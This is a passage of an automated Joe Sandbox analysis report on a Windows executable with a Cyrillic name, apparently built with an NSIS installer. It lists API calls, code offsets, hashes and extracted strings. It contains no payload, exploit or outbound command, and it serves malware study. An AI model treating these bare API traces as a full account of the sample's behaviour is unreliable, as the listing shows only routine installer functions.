                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                    • String ID: F$Grundlovssikrende36 Setup
                                                                                                                                                                                                                    • API String ID: 941294808-2845570667
                                                                                                                                                                                                                    • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                                                    • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                                                                                                                                                                      • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                      • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                                                      • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                      • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                                                                                                                    • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                                                    • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                    • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe", xrefs: 0040654E
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                                                                                                                                                                                                    • *?|<>/":, xrefs: 004065A0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                    • API String ID: 589700163-3539824888
                                                                                                                                                                                                                    • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                    • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                    • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                                                    • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                                                                                                    • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                                                                                    • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F2621EC,?,00000808), ref: 6F261635
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F2621EC,?,00000808), ref: 6F26163C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F2621EC,?,00000808), ref: 6F261650
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(!&o,00000000), ref: 6F261657
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F261660
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                    • String ID: !&o
                                                                                                                                                                                                                    • API String ID: 1148316912-201577036
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                                    • MulDiv.KERNEL32(000B35D3,00000064,000B35D7), ref: 00402E3C
                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F26121B: GlobalAlloc.KERNELBASE(00000040,?,6F26123B,?,6F2612DF,00000019,6F2611BE,-000000A0), ref: 6F261225
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F262657
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F26268C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                                                    • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                                                    • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsk21A3.tmp$C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll
                                                                                                                                                                                                                    • API String ID: 3109718747-2929397095
                                                                                                                                                                                                                    • Opcode ID: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                                                                                    • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F2624D6
                                                                                                                                                                                                                      • Part of subcall function 6F26122C: lstrcpynW.KERNEL32(00000000,?,6F2612DF,00000019,6F2611BE,-000000A0), ref: 6F26123C
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 6F26245C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F262477
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4216380887-0
                                                                                                                                                                                                                    • Opcode ID: 9706cd176f530de5e0ca20216721cc6f4d477c1c635a7862713a1a6319a1a89f
                                                                                                                                                                                                                    • Instruction ID: cddff6bc482745921a821bc3733bdaec2af800f7d8ed8e90f81bace9b09bc669
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9706cd176f530de5e0ca20216721cc6f4d477c1c635a7862713a1a6319a1a89f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41ADF0008709EFDB14DF28D844A6677B8FB4A725B10895EE446879C1EB74A4D4CF61
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                                                    • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                                                    • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                                                    • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                                                                                    • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                    • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                                                    • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                                                    • API String ID: 3540041739-3551169577
